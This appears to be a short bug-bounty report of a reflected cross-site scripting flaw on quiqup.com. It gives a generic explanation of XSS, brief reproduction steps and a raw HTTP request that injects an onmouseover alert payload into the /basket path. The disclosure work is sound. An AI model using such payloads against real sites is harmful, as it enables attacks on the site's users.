Reflected XSS on Quiqup.com
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Steps To Reproduce:
1. Goto this URL.
2.Intercept the request and insert XSS Payload after URL.
3. XSS Executed.
GET /basket//”onmouseover=’alert(1)’bad=” HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept-Encoding: gzip, deflate